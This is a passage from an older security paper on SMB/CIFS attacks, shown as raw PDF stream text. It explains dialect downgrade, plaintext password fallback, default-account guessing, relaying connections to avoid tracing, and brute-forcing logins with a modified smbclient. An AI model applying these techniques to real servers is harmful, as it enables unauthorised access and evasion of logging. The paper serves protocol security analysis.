0 0 1 54 386.4 Tm (correct, or the name was right but no service of the requested name type is) Tj 1 0 0 1 54 375.9 Tm (running. Smbclient translates these errors respectively as "called name not) Tj 1 0 0 1 54 365.4 Tm (present" or "not listening on called name." Usually if server-name/type 0x20) Tj 1 0 0 1 54 354.9 Tm (is unreachable, the target is not sharing its resources at all and there isn't) Tj 1 0 0 1 54 344.4 Tm (much more we can do with it. Sessions to server-name/type 0x3 may work to) Tj 1 0 0 1 54 333.9 Tm (reach the messaging service and is sometimes a way to check if we got at least) Tj 1 0 0 1 54 323.4 Tm (one name right, but short of sending annoying messages to the console user it) Tj 1 0 0 1 54 312.9 Tm (is not particularly useful. Smbclient has a "-M" argument to do message) Tj 1 0 0 1 54 302.4 Tm (sending. The spec provides for a "not listening for CALLING name" error,) Tj 1 0 0 1 54 291.9 Tm (implying a potential facility for access restriction by specific client, but) Tj 1 0 0 1 54 281.4 Tm (today's implementations don't seem to care.) Tj 1 0 0 1 54 260.4 Tm (If all UDP name queries above have failed, the same sorts of guessing at the) Tj 1 0 0 1 54 249.9 Tm (target's computername can be tried here, one per TCP connection. If the) Tj 1 0 0 1 54 239.4 Tm (connection is relayed via an intermediate machine such as a proxy, the client) Tj 1 0 0 1 54 228.9 Tm (must still supply the correct name of the target server. Microsoft clients) Tj 1 0 0 1 54 218.4 Tm (can be faked out with an appropriate LMHOSTS entry with the name of the final) Tj 1 0 0 1 54 207.9 Tm (destination but the IP address of the *relayer*. As long as the final target) Tj 1 0 0 1 54 197.4 Tm (sees its own name in the request, it doesn't matter how it got there. An) Tj 1 0 0 1 54 186.9 Tm (example fast way to script up different LMHOSTS names on the fly would be) Tj 1 0 0 1 54 176.4 Tm (having "#INCLUDE ramdisk-file-name" in the main LMHOSTS file, to avoid) Tj 1 0 0 1 54 165.9 Tm (repeatedly writing to the hard drive just to test a bunch of targets. The) Tj 1 0 0 1 54 155.4 Tm (CIFS spec mentions that the magic target name "*SMBSERVER" is supposed to be) Tj 1 0 0 1 54 144.9 Tm (some sort of wildcard, but it is optional and no current Microsoft platforms) Tj 1 0 0 1 54 134.4 Tm (seem to accept it to open sessions. Samba does, simply because by design it) Tj 1 0 0 1 54 123.9 Tm (accepts any old pair of names for sessions and more sensibly logs the client's) Tj 1 0 0 1 54 113.4 Tm (IP address if appropriately configured.) Tj 1 0 0 1 54 92.4 Tm (Using a relay host can foil backtracing efforts by someone who notices odd) Tj 1 0 0 1 54 81.9 Tm (network activity or log entries and goes to investigate. A suitable relayer) Tj ET Q endstream endobj 38 0 obj 5701 endobj 33 0 obj << /Type /Page /MediaBox [0 0 612 792] /Parent 2 0 R /Resources << /ProcSet [/PDF /Text] /Font << /R36 36 0 R >> >> /Contents [ 34 0 R 37 0 R ] >> endobj 40 0 obj << /Length 41 0 R >> stream q Q q W 54 72 m 558 72 l 558 720 l 54 720 l h n endstream endobj 41 0 obj 48 endobj 42 0 obj << /Type /Font /Name /R42 /Subtype /Type1 /BaseFont /Courier >> endobj 43 0 obj << /Length 44 0 R >> stream BT /R42 10 Tf 1 0 0 1 54 711.9 Tm (program can take just about any form, such a simple netcat script, a SOCKS) Tj 1 0 0 1 54 701.4 Tm (gateway, or even Microsoft's own "Catapult" proxy package. The relay would) Tj 1 0 0 1 54 690.9 Tm (presumably listen on TCP 139 and forward the connection, but with smbclient) Tj 1 0 0 1 54 680.4 Tm (the relay can listen on any other port and we can supply the "-p {portnum}") Tj 1 0 0 1 54 669.9 Tm (argument to reach it. If a high-port relay is already behind a packet filter) Tj 1 0 0 1 54 659.4 Tm (that blocks TCP 139 but allows >1024, not only is the firewall bypassed but) Tj 1 0 0 1 54 648.9 Tm (the resulting server connection may look like a completely normal one from a) Tj 1 0 0 1 54 638.4 Tm (trusted inside host.) Tj 1 0 0 1 54 617.4 Tm (Some Linux distributions anticipate being used as Samba servers, and come) Tj 1 0 0 1 54 606.9 Tm (with an "nbsession" entry in inetd.conf but no server program to handle the) Tj 1 0 0 1 54 596.4 Tm (connection. These will listen on TCP 139 but immediately close, while) Tj 1 0 0 1 54 585.9 Tm (noting an appropriate error in the syslog.) Tj 1 0 0 1 54 564.9 Tm (A brief digression about SMB) Tj 1 0 0 1 54 554.4 Tm (============================) Tj 1 0 0 1 54 533.4 Tm (So far none of this has involved any actual Shared Message Block protocol.) Tj 1 0 0 1 54 522.9 Tm (The CIFS spec contains a detailed rundown on SMB packet formats. While SMB) Tj 1 0 0 1 54 512.4 Tm (can run over various transports including IP, here we only discuss its usual) Tj 1 0 0 1 54 501.9 Tm (interaction via TCP 139. A 4-byte block length is sent down the TCP stream) Tj 1 0 0 1 54 491.4 Tm (followed by the block itself, so the transport handlers then know how much to) Tj 1 0 0 1 54 480.9 Tm (read from or write to the network. SMB is thus independent of how IP-level) Tj 1 0 0 1 54 470.4 Tm (packets split up the stream -- it doesn't care, it just keeps reading a) Tj 1 0 0 1 54 459.9 Tm (connected socket until it satisfies the length's worth or times out. SMB) Tj 1 0 0 1 54 449.4 Tm (blocks can be up to 65536 bytes long *excluding* the length integer, but in) Tj 1 0 0 1 54 438.9 Tm (practice the blocks are usually smaller. SMB also trusts the TCP reliable) Tj 1 0 0 1 54 428.4 Tm (transport layer to segregate different client sessions. In an alternate mode) Tj 1 0 0 1 54 417.9 Tm (that uses UDP 138 the data blocks look almost the same, except that 12 bytes) Tj 1 0 0 1 54 407.4 Tm (of unused "filler" are used under UDP to pass various session and sequencing) Tj 1 0 0 1 54 396.9 Tm (context info. Many SMB request types support what is called the "AndX") Tj 1 0 0 1 54 386.4 Tm (mechanism, which provides a way to send several requests at once. Fields in) Tj 1 0 0 1 54 375.9 Tm (these specify how to locate any subsequent SMB requests that were "batched") Tj 1 0 0 1 54 365.4 Tm (into this block. See the spec for more information.) Tj 1 0 0 1 54 344.4 Tm (The Samba code builds SMB blocks into buffers using a bunch of hairy macros) Tj 1 0 0 1 54 333.9 Tm (with names like "SSVAL" to move short and long integers around and convert) Tj 1 0 0 1 54 323.4 Tm (byte-ordering. [For a fun time, try unsnarling "byteorder.h".] Since Samba) Tj 1 0 0 1 54 312.9 Tm (builds these internal buffers to include the 4-byte block length at offset 0,) Tj 1 0 0 1 54 302.4 Tm (any other offsets described here are relative to that. After the block length) Tj 1 0 0 1 54 291.9 Tm (comes the SMB header itself, starting at offset 4 in our reference frame with) Tj 1 0 0 1 54 281.4 Tm (0xFF, 'S', 'M', 'B'. A one-byte command code and several fixed-length fields) Tj 1 0 0 1 54 270.9 Tm (follow, ending the SMB header proper. The command code indicates the type of) Tj 1 0 0 1 54 260.4 Tm (SMB being requested or responded to. The request / response descriptions in) Tj 1 0 0 1 54 249.9 Tm (CIFS exclude the header, and only detail what follows. After the header is a) Tj 1 0 0 1 54 239.4 Tm (length byte and a variable-length bunch of two-byte "parameter words", and) Tj 1 0 0 1 54 228.9 Tm (finally any associated buffers which can contain values, strings, file data,) Tj 1 0 0 1 54 218.4 Tm (or whatever. A rough chart of this is given in Appendix C. The parameter) Tj 1 0 0 1 54 207.9 Tm (words begin at offset 37 and are where most of the work gets done; in Samba) Tj 1 0 0 1 54 197.4 Tm (they are called "smb_vwvN" where N is a number starting with 0. The buffers) Tj 1 0 0 1 54 186.9 Tm (start at a variable offset depending on how many parameter words preceded;) Tj 1 0 0 1 54 176.4 Tm (Samba has a routine called smb_buf\(\) to dig through and find it. It should be) Tj 1 0 0 1 54 165.9 Tm (noted that while the leading length bytes are in network order, all values) Tj 1 0 0 1 54 155.4 Tm (inside the SMB blocks must be in "Intel" or little-endian order! In general) Tj 1 0 0 1 54 144.9 Tm (both the block structure *and* what gets placed into it is all rather complex) Tj 1 0 0 1 54 134.4 Tm (and confusing, and if it's any reassurance, the comments in earlier versions) Tj 1 0 0 1 54 123.9 Tm (of Samba hint that much of it started as total guesswork and verbatim copying) Tj 1 0 0 1 54 113.4 Tm (of block sections from packet dumps of sessions between MS boxes. As more) Tj 1 0 0 1 54 102.9 Tm (SMB-savvy contributors came into the Samba development picture, these blind) Tj 1 0 0 1 54 92.4 Tm (but somehow functional shots in the dark became better explained and recoded.) Tj ET Q endstream endobj 44 0 obj 5484 endobj 39 0 obj << /Type /Page /MediaBox [0 0 612 792] /Parent 2 0 R /Resources << /ProcSet [/PDF /Text] /Font << /R42 42 0 R >> >> /Contents [ 40 0 R 43 0 R ] >> endobj 46 0 obj << /Length 47 0 R >> stream q Q q W 54 72 m 558 72 l 558 720 l 54 720 l h n endstream endobj 47 0 obj 48 endobj 48 0 obj << /Type /Font /Name /R48 /Subtype /Type1 /BaseFont /Courier >> endobj 49 0 obj << /Length 50 0 R >> stream BT /R48 10 Tf 1 0 0 1 54 711.9 Tm (When working with NT we often encounter something called "unicode", a somewhat) Tj 1 0 0 1 54 701.4 Tm (warped international character encoding standard. Strings are encoded into) Tj 1 0 0 1 54 690.9 Tm (sequences of two-byte words, wasting twice the storage space required. This) Tj 1 0 0 1 54 680.4 Tm (causes the string "ABC" to appear as "41 00 42 00 43 00" in hex dumps, and) Tj 1 0 0 1 54 669.9 Tm (pops up in registry entries, SMB packets, and many other places. The lengths) Tj 1 0 0 1 54 659.4 Tm (of unicode strings are usually stored elsewhere, such as [but not always] in) Tj 1 0 0 1 54 648.9 Tm (an SMB parameter word, and there is sometimes confusion about precisely how) Tj 1 0 0 1 54 638.4 Tm (long any string is. For example, is unicode "ABC" of size 3 or size 6? If we) Tj 1 0 0 1 54 627.9 Tm (include and count a terminating null as required when sending passwords, is it) Tj 1 0 0 1 54 617.4 Tm (then of size 4, 7, or perhaps even 8? To make matters even worse the strings) Tj 1 0 0 1 54 606.9 Tm (must in theory be word-aligned in memory, and to force this to be true a) Tj 1 0 0 1 54 596.4 Tm (leading null is supposed to be *inserted* ahead of the first character. The) Tj 1 0 0 1 54 585.9 Tm (latest Samba server version contains a small fix for a common case where NT) Tj 1 0 0 1 54 575.4 Tm (clients cannot quite decide consistently about the length of a null password) Tj 1 0 0 1 54 564.9 Tm (string, and may send it as either 1 or 0.) Tj 1 0 0 1 54 543.9 Tm (One important part of the header we need to be aware of is two words beginning) Tj 1 0 0 1 54 533.4 Tm (at offset 9 -- the response class and error codes, called smb_rcls and) Tj 1 0 0 1 54 522.9 Tm (smb_err. These describe protocol errors in some detail, and there is a fairly) Tj 1 0 0 1 54 512.4 Tm (large translation table of the most common errors near the end of client.c.) Tj 1 0 0 1 54 501.9 Tm (The two error classes we usually ever see in practice are DOS and SERVER.) Tj 1 0 0 1 54 491.4 Tm (There are several different possible class/error response combinations to) Tj 1 0 0 1 54 480.9 Tm (describe any one kind of problem, such as failure to authenticate a user, and) Tj 1 0 0 1 54 470.4 Tm (which pairs get sent back depends upon what type of platform the target is.) Tj 1 0 0 1 54 459.9 Tm (The patch kit below includes a small routine called interpret_error\(\) that) Tj 1 0 0 1 54 449.4 Tm (boils an assortment of common errors down into a couple of standard return) Tj 1 0 0 1 54 438.9 Tm (codes. This helps us distinguish between fatal errors, nonfatal errors and) Tj 1 0 0 1 54 428.4 Tm (password problems, which figures significantly in a later phase of the attack.) Tj 1 0 0 1 54 417.9 Tm (Some of the information here is not documented in CIFS, but can be found by) Tj 1 0 0 1 54 407.4 Tm (doing "net helpmsg {smb_err #}" under NT, which seems to have a very complete) Tj 1 0 0 1 54 396.9 Tm (set of error message texts available.) Tj 1 0 0 1 54 375.9 Tm (Phase 2: Dialect negotiation) Tj 1 0 0 1 54 365.4 Tm (============================) Tj 1 0 0 1 54 344.4 Tm (Assuming an open TCP connection and successful session request, SMB request) Tj 1 0 0 1 54 333.9 Tm (blocks may now be sent. The next step is for client and server to agree on) Tj 1 0 0 1 54 323.4 Tm (the "dialect" of SMB protocol they can support. Over time, SMB has evolved) Tj 1 0 0 1 54 312.9 Tm (from earliest "Microsoft networks" core protocol, through two types of Lan) Tj 1 0 0 1 54 302.4 Tm (Manager and up to the current variant that NT uses. Each new dialect adds a) Tj 1 0 0 1 54 291.9 Tm (couple of features, to support things like new authentication protocols and) Tj 1 0 0 1 54 281.4 Tm (long filenames. The client sends a list of dialects it supports as [get) Tj 1 0 0 1 54 270.9 Tm (this!] a bunch of null-terminated ASCII strings, including entries like) Tj 1 0 0 1 54 249.9 Tm ( PC NETWORK PROGRAM 1.0) Tj 1 0 0 1 54 239.4 Tm ( MICROSOFT NETWORKS 1.03) Tj 1 0 0 1 54 228.9 Tm ( LANMAN1.0) Tj 1 0 0 1 54 218.4 Tm ( LM1.2X002) Tj 1 0 0 1 54 207.9 Tm ( LANMAN2.1) Tj 1 0 0 1 54 197.4 Tm ( NT LM 0.12) Tj 1 0 0 1 54 176.4 Tm (which the server string-compares against dialects it recognizes and picks the) Tj 1 0 0 1 54 165.9 Tm ("highest" common protocol level. There is a big comment in Samba's server.c) Tj 1 0 0 1 54 155.4 Tm (just before reply_negprot\(\) describing what most server platforms do with) Tj 1 0 0 1 54 144.9 Tm (this. A response is built and sent back to the client, containing several) Tj 1 0 0 1 54 134.4 Tm (important items: a numeric index into the dialect list to indicate which to) Tj 1 0 0 1 54 123.9 Tm (use, some security-relevant flags, and an optional 8-byte "encryption key" to) Tj 1 0 0 1 54 113.4 Tm (use for authentication. This "key" is a random challenge nonce that the) Tj 1 0 0 1 54 102.9 Tm (server generates and temporarily remembers. A confusingly named "session) Tj 1 0 0 1 54 92.4 Tm (key" is also sent, which is just some sort of unique but mostly unimportant) Tj 1 0 0 1 54 81.9 Tm (identifier and *not* the same as the cryptkey.) Tj ET Q endstream endobj 50 0 obj 5167 endobj 45 0 obj << /Type /Page /MediaBox [0 0 612 792] /Parent 2 0 R /Resources << /ProcSet [/PDF /Text] /Font << /R48 48 0 R >> >> /Contents [ 46 0 R 49 0 R ] >> endobj 52 0 obj << /Length 53 0 R >> stream q Q q W 54 72 m 558 72 l 558 720 l 54 720 l h n endstream endobj 53 0 obj 48 endobj 54 0 obj << /Type /Font /Name /R54 /Subtype /Type1 /BaseFont /Courier >> endobj 55 0 obj << /Length 56 0 R >> stream BT /R54 10 Tf 1 0 0 1 54 708.9 Tm (Most SMB servers support backward dialect compatibility, and even if we) Tj 1 0 0 1 54 698.4 Tm (support the latest NT we can always lie and exclude some of the later dialects) Tj 1 0 0 1 54 687.9 Tm (from the list we send. Sessions between two NT machines involve more complex) Tj 1 0 0 1 54 677.4 Tm (security protocols, so for our attack purposes it is definitely worth our) Tj 1 0 0 1 54 666.9 Tm (while to convince a server that we are a dumb old client that can't handle) Tj 1 0 0 1 54 656.4 Tm (the fancier stuff. Microsoft clients can't do this but smbclient can, with a) Tj 1 0 0 1 54 645.9 Tm (settable max_protocol variable, and we should therefore plug "-m LANMAN2" into) Tj 1 0 0 1 54 635.4 Tm (our command line to force the server to dumb itself down somewhat. Smbclient) Tj 1 0 0 1 54 624.9 Tm (also parses dialects as strings here, not numeric levels.) Tj 1 0 0 1 54 603.9 Tm (The security mode flags appear in smb_vwv1, and we need to pay attention to) Tj 1 0 0 1 54 593.4 Tm (the low two bits thereof. Smbclient tells us what this "sec mode" is at debug) Tj 1 0 0 1 54 582.9 Tm (level 3. The earlier NetBIOS implementations optionally required a simple) Tj 1 0 0 1 54 572.4 Tm (password to connect to a shared filesystem, and had no real concept of *who*) Tj 1 0 0 1 54 561.9 Tm (was connecting as long as the correct password was supplied. Everyone using) Tj 1 0 0 1 54 551.4 Tm (such a fileshare must know the single password for it, which is considered) Tj 1 0 0 1 54 540.9 Tm (fairly lame from a security standpoint. This is called "share-level) Tj 1 0 0 1 54 530.4 Tm (security", and is used by Windows for Workgroups, Samba if appropriately) Tj 1 0 0 1 54 519.9 Tm (configured, and maybe some other Lan Manager platforms. Later dialects have a) Tj 1 0 0 1 54 509.4 Tm (concept of individual user login, and indicate this "user-level security" by) Tj 1 0 0 1 54 498.9 Tm (setting the LSB of the security flags. The next higher bit in the flags) Tj 1 0 0 1 54 488.4 Tm (indicates whether the client should use "password encryption" or not. Thus if) Tj 1 0 0 1 54 477.9 Tm (smbclient reports "sec mode 3" as it does when connecting to most NT servers,) Tj 1 0 0 1 54 467.4 Tm (both of these bits are set. Sometimes we see a reference to "server-level) Tj 1 0 0 1 54 456.9 Tm (security", but this simply means that authentication data is forwarded to a) Tj 1 0 0 1 54 446.4 Tm (Domain Controller machine for validation and does not affect the mode bits.) Tj 1 0 0 1 54 425.4 Tm (Dialect negotiation must occur on a connection before other SMB types may be) Tj 1 0 0 1 54 414.9 Tm (sent. If dialect negotiation fails for some reason, the server sends a FIN) Tj 1 0 0 1 54 404.4 Tm (along with the response and the TCP connection must be closed and reopened.) Tj 1 0 0 1 54 393.9 Tm (One way to observe this is to try negotiating the dialect either twice or not) Tj 1 0 0 1 54 383.4 Tm (at all on a given connection. If a server is running in user-level security) Tj 1 0 0 1 54 372.9 Tm (and a protocol is negotiated that does not support user login at all, the) Tj 1 0 0 1 54 362.4 Tm (server will generally set the user-level bit anyway and wind up refusing to) Tj 1 0 0 1 54 351.9 Tm (allow most other SMB transactions on that connection until successful user) Tj 1 0 0 1 54 341.4 Tm (authentication is performed. This happens during the next phase.) Tj 1 0 0 1 54 320.4 Tm (Phase 3: SMB session setup) Tj 1 0 0 1 54 309.9 Tm (==========================) Tj 1 0 0 1 54 288.9 Tm (A server running in user-level security generally requires this step before) Tj 1 0 0 1 54 278.4 Tm (allowing access to shared resources. This phase can be skipped entirely) Tj 1 0 0 1 54 267.9 Tm (against share-level servers, or used anyway to pass additional info about) Tj 1 0 0 1 54 257.4 Tm (buffer sizes and client capabilities. Normally here is where usernames and) Tj 1 0 0 1 54 246.9 Tm (passwords get plugged in and the "attack" really begins. The official CIFS) Tj 1 0 0 1 54 236.4 Tm (name for this phase is SessionSetupAndX, implying once again that additional) Tj 1 0 0 1 54 225.9 Tm (SMB requests can and often are batched into this block. Note carefully that) Tj 1 0 0 1 54 215.4 Tm (despite the unfortunately confusing name, this "session setup" is a very) Tj 1 0 0 1 54 204.9 Tm (DIFFERENT animal from the RFC1001/1002-style TCP "session setup" done in) Tj 1 0 0 1 54 194.4 Tm (phase 0! In general the different TCP sessions distinguish between client) Tj 1 0 0 1 54 183.9 Tm (*machines*, while a "UID" determined during this SMB setup phase distinguishes) Tj 1 0 0 1 54 173.4 Tm (an individual *user* on a given client. This implies that all SMB traffic) Tj 1 0 0 1 54 162.9 Tm (between a given client and server pair may pass over a single TCP connection) Tj 1 0 0 1 54 152.4 Tm (regardless of originating user, although this is not required behavior by any) Tj 1 0 0 1 54 141.9 Tm (means since servers can support several concurrent TCP connections. It also) Tj 1 0 0 1 54 131.4 Tm (implies that multiple SMB setup requests can be sent across the single) Tj 1 0 0 1 54 120.9 Tm (connection instance, which is perhaps the key thing that throws it wide open) Tj 1 0 0 1 54 110.4 Tm (to various attacks.) Tj 1 0 0 1 54 89.4 Tm (The contents of this block and the server response vary somewhat depending) Tj 1 0 0 1 54 78.9 Tm (on the agreed dialect level and security flags. The most relevant items in) Tj ET Q endstream endobj 56 0 obj 5486 endobj 51 0 obj << /Type /Page /MediaBox [0 0 612 792] /Parent 2 0 R /Resources << /ProcSet [/PDF /Text] /Font << /R54 54 0 R >> >> /Contents [ 52 0 R 55 0 R ] >> endobj 58 0 obj << /Length 59 0 R >> stream q Q q W 54 72 m 558 72 l 558 720 l 54 720 l h n endstream endobj 59 0 obj 48 endobj 60 0 obj << /Type /Font /Name /R60 /Subtype /Type1 /BaseFont /Courier >> endobj 61 0 obj << /Length 62 0 R >> stream BT /R60 10 Tf 1 0 0 1 54 711.9 Tm (the request are a username and either a plaintext password or a hash derived) Tj 1 0 0 1 54 701.4 Tm (from it. Other items include maximum buffer sizes, various other client) Tj 1 0 0 1 54 690.9 Tm (information such as its domain and running OS [all of which can be faked up],) Tj 1 0 0 1 54 680.4 Tm (and perhaps further SMB commands via the AndX mechanism.) Tj 1 0 0 1 54 659.4 Tm (Microsoft boxes collect a username and password through one or another "logon") Tj 1 0 0 1 54 648.9 Tm (dialog. Under WFWG, the simplest command-line way to change them on the fly) Tj 1 0 0 1 54 638.4 Tm (is "net logon {user}" which sets them up for a subsequent "net use". NT) Tj 1 0 0 1 54 627.9 Tm (requires a login to use the client workstation and saves the username and) Tj 1 0 0 1 54 617.4 Tm (password from that as default credentials for subsequent filesharing, but) Tj 1 0 0 1 54 606.9 Tm (these can be overridden in its "net" command line with optional /USER and) Tj 1 0 0 1 54 596.4 Tm (password arguments. Smbclient accepts "-U username", and asks for a password) Tj 1 0 0 1 54 585.9 Tm (that it will plug in at the appropriate time. The unmodified version accepts) Tj 1 0 0 1 54 575.4 Tm (a password on the command line as an optional argument after the sharename, or) Tj 1 0 0 1 54 564.9 Tm (by using the format "-U user%passwd". In many cases the password must be in) Tj 1 0 0 1 54 554.4 Tm (all UPPERCASE, but some servers may accept or even require mixed-case even in) Tj 1 0 0 1 54 543.9 Tm (LANMAN-only dialect -- this is a bit of a crap shoot, so try it both ways.) Tj 1 0 0 1 54 533.4 Tm (The Samba server has hooks to try a couple of different permutations in an) Tj 1 0 0 1 54 522.9 Tm (effort to authenticate oddball clients, with appropriate warnings about) Tj 1 0 0 1 54 512.4 Tm (reduced keyspace.) Tj 1 0 0 1 54 491.4 Tm (Under user-level security a successful login means we are basically "in" as) Tj 1 0 0 1 54 480.9 Tm (either the target user or a guest. The SMB response contains some strings) Tj 1 0 0 1 54 470.4 Tm (containing the server's OS and version, and an important SMB header field) Tj 1 0 0 1 54 459.9 Tm (called the UID. This is not quite the same thing as a Unix UID, although for) Tj 1 0 0 1 54 449.4 Tm (convenience Samba does use the Unix UID of the authenticating user here.) Tj 1 0 0 1 54 438.9 Tm (Microsoft servers construct an internal set of user credentials and rights and) Tj 1 0 0 1 54 428.4 Tm (assign the UID as a token that refers to it. The UID is in theory unique only) Tj 1 0 0 1 54 417.9 Tm (within the context of the enclosing TCP connection -- if multiple SMB sessions) Tj 1 0 0 1 54 407.4 Tm (are active across one TCP connection the UID distinguishes the separate users) Tj 1 0 0 1 54 396.9 Tm (there, and in theory different users on different TCP sockets could wind up) Tj 1 0 0 1 54 386.4 Tm (being assigned the same UID. There is also a process-ID or PID header field) Tj 1 0 0 1 54 375.9 Tm (that the *client* initiates, but that seems to hold little relevance except) Tj 1 0 0 1 54 365.4 Tm (for some file-locking calls. Again, regardless of server platform the UID is) Tj 1 0 0 1 54 354.9 Tm (merely a reference token and while playing games with UID/GID values may be) Tj 1 0 0 1 54 344.4 Tm (effective against NFS servers, trying it here it only produces "invalid UID") Tj 1 0 0 1 54 333.9 Tm (SMB errors or is simply ignored by the server. The server can optionally set) Tj 1 0 0 1 54 323.4 Tm (a flag in the setup response that indicates that a given session is a "guest") Tj 1 0 0 1 54 312.9 Tm (login. Samba does this and NT does not, but the setting of this bit seems) Tj 1 0 0 1 54 302.4 Tm (irrelevant to the rights a given active UID has on the server anyway.) Tj 1 0 0 1 54 281.4 Tm (There are several possible error responses here, which our interpret_error) Tj 1 0 0 1 54 270.9 Tm (routine turns into something we can recognize to mean whether to continue the) Tj 1 0 0 1 54 260.4 Tm (attack or give up. An unknown username and/or password in most cases comes) Tj 1 0 0 1 54 249.9 Tm (back as "access denied" unless unknown/null users get mapped to GUEST. There) Tj 1 0 0 1 54 239.4 Tm (are some errors that imply that the supplied credentials were right but there) Tj 1 0 0 1 54 228.9 Tm (is some other problem, such as "account disabled" or "cannot log in from the) Tj 1 0 0 1 54 218.4 Tm (network." In such cases further attempts with a given username will probably) Tj 1 0 0 1 54 207.9 Tm (be unproductive, but remember that here the TCP connection remains open) Tj 1 0 0 1 54 197.4 Tm (regardless of the return status, allowing ample opportunity for retries with) Tj 1 0 0 1 54 186.9 Tm (any other username and password. Protocol errors or transient server problems) Tj 1 0 0 1 54 176.4 Tm (can also occur, some of which may imply that a new TCP session is needed.) Tj 1 0 0 1 54 155.4 Tm (Two important usernames to try right off against Microsoft platforms are) Tj 1 0 0 1 54 144.9 Tm (ADMINISTRATOR and GUEST, since these usually exist out of the box and all too) Tj 1 0 0 1 54 134.4 Tm (often have null passwords. If the ADMINISTRATOR login has been renamed to) Tj 1 0 0 1 54 123.9 Tm ("something obscure" as recommended in several texts, its new name may show up) Tj 1 0 0 1 54 113.4 Tm (somewhere on the target network as a type 0x3 anyway. As mentioned before,) Tj 1 0 0 1 54 102.9 Tm (any other base computernames and type 0x3 messaging names collected from the) Tj 1 0 0 1 54 92.4 Tm (target network are all potential usernames. A machine running the Microsoft) Tj 1 0 0 1 54 81.9 Tm (web server may have an account of the form IUSR_{basename} that got quietly) Tj ET Q endstream endobj 62 0 obj 5712 endobj 57 0 obj << /Type /Page /MediaBox [0 0 612 792] /Parent 2 0 R /Resources << /ProcSet [/PDF /Text] /Font << /R60 60 0 R >> >> /Contents [ 58 0 R 61 0 R ] >> endobj 64 0 obj << /Length 65 0 R >> stream q Q q W 54 72 m 558 72 l 558 720 l 54 720 l h n endstream endobj 65 0 obj 48 endobj 66 0 obj << /Type /Font /Name /R66 /Subtype /Type1 /BaseFont /Courier >> endobj 67 0 obj << /Length 68 0 R >> stream BT /R66 10 Tf 1 0 0 1 54 711.9 Tm (created during setup, and it is said that the SQL server pulls similar stunts.) Tj 1 0 0 1 54 701.4 Tm (A null username or one that is unknown to the server is often accepted as a) Tj 1 0 0 1 54 690.9 Tm (guest login that allows some limited amount of poking around -- often enough) Tj 1 0 0 1 54 680.4 Tm (access to at least read files from the server if not write to them. Any hint) Tj 1 0 0 1 54 669.9 Tm (at an account used for disk backups in an NT environment should be pursued,) Tj 1 0 0 1 54 659.4 Tm (since such an account probably has "backup" privileges to read the entire) Tj 1 0 0 1 54 648.9 Tm (filesystem including the normally inaccessible SAM security database. If the) Tj 1 0 0 1 54 638.4 Tm (server is running Samba itself, a null username and password may grant guest) Tj 1 0 0 1 54 627.9 Tm (access. Try some Unix accounts that have known or null passwords -- Samba by) Tj 1 0 0 1 54 617.4 Tm (default disallows logins by accounts with null passwords, but for any) Tj 1 0 0 1 54 606.9 Tm (allowable ones does not check for a valid user shell like other daemons do.) Tj 1 0 0 1 54 596.4 Tm (Try likely null ones anyway since some sites may be configured to allow them.) Tj 1 0 0 1 54 585.9 Tm (An exception to the null-password rule is Samba's default "pcguest" account in) Tj 1 0 0 1 54 575.4 Tm (smb.conf, which many sites remap to "nobody" or something rather than create a) Tj 1 0 0 1 54 564.9 Tm (new /etc/passwd entry.) Tj 1 0 0 1 54 543.9 Tm (If the client supports password encryption, it uses the user's password as) Tj 1 0 0 1 54 533.4 Tm (input to one or both of two possible encryption algorithms referred to as the) Tj 1 0 0 1 54 522.9 Tm (LANMAN method and the NT method. These algorithms are described in CIFS in) Tj 1 0 0 1 54 512.4 Tm (excruciating detail, and reviewed in Appendix A here. By deliberately dumbing) Tj 1 0 0 1 54 501.9 Tm (down our negotiated protocol level we can eliminate the need for the NT-style) Tj 1 0 0 1 54 491.4 Tm (field even if connecting to an NT-dialect server. For backward compatibility) Tj 1 0 0 1 54 480.9 Tm (NT accepts the LANMAN password format, which completely obviates the increased) Tj 1 0 0 1 54 470.4 Tm (security supposedly given by long case-sensitive passwords. It is important) Tj 1 0 0 1 54 459.9 Tm (to understand that it is the CLIENT that chooses whether or not to use) Tj 1 0 0 1 54 449.4 Tm (password encryption, and the server's "use encryption" security mode bit is) Tj 1 0 0 1 54 438.9 Tm (just a gentle suggestion. If a server cannot authenticate via a 24-byte) Tj 1 0 0 1 54 428.4 Tm (crypto response it is supposed to use whatever is given AS PLAINTEXT. This is) Tj 1 0 0 1 54 417.9 Tm (another major weakness in the protocol spec, since a compliant server cannot) Tj 1 0 0 1 54 407.4 Tm (enforce use of encryption! We therefore don't even need "libdes" or the Samba) Tj 1 0 0 1 54 396.9 Tm (crypto support for our attack kit, we can just send plaintext passwords.) Tj 1 0 0 1 54 386.4 Tm (Furthermore, since at this point we can send multiple SetupAndX exchanges) Tj 1 0 0 1 54 375.9 Tm (REGARDLESS of whether they succeed or fail, the opportunity for brute-force) Tj 1 0 0 1 54 365.4 Tm (guessing is obvious. Most stock client apps are not useful as brute-forcing) Tj 1 0 0 1 54 354.9 Tm (engines since they exit after one or two failed authentications, but our patch) Tj 1 0 0 1 54 344.4 Tm (kit modifies smbclient's send_login\(\) routine to keep trying until it either) Tj 1 0 0 1 54 333.9 Tm (succeeds or runs out of passwords to try.) Tj 1 0 0 1 54 312.9 Tm (While this phase is ripe for brute-force attacks, it is also where servers) Tj 1 0 0 1 54 302.4 Tm (might start logging things. Entries wind up, relative to their respective) Tj 1 0 0 1 54 291.9 Tm (system-root directories, in "audit.log" under Windows, "config\\secevent.evt") Tj 1 0 0 1 54 281.4 Tm (under the NT system directory, and "var/log.smb" on a Samba server. Microsoft) Tj 1 0 0 1 54 270.9 Tm (platforms [particularly NT] open their log files in an exclusive way that) Tj 1 0 0 1 54 260.4 Tm (prevents other processes from directly reading or modifying them, and Samba's) Tj 1 0 0 1 54 249.9 Tm (logfiles can be protected against normal users. Unfortunately the default) Tj 1 0 0 1 54 239.4 Tm (setup for what *gets* logged is weak or nonexistent. Windows seems only to) Tj 1 0 0 1 54 228.9 Tm (log full filesharing connection attempts, which do not happen at this phase,) Tj 1 0 0 1 54 218.4 Tm (and the logging is controlled via simple SYSTEM.INI lines. NT out of the box) Tj 1 0 0 1 54 207.9 Tm (logs NOTHING -- one must configure the NT "system policy" to *do* the logging) Tj 1 0 0 1 54 197.4 Tm (for both failed and successful user logins, and only the name given by the) Tj 1 0 0 1 54 186.9 Tm (connecting client is saved -- NOT its IP address. Other Microsoft platforms) Tj 1 0 0 1 54 176.4 Tm (have the same problem. Unless someone actively runs "netstat -a" during the) Tj 1 0 0 1 54 165.9 Tm (attack or provides some third-party enhanced logging facility, no useful) Tj 1 0 0 1 54 155.4 Tm (backtracing information will be saved. The Samba server by 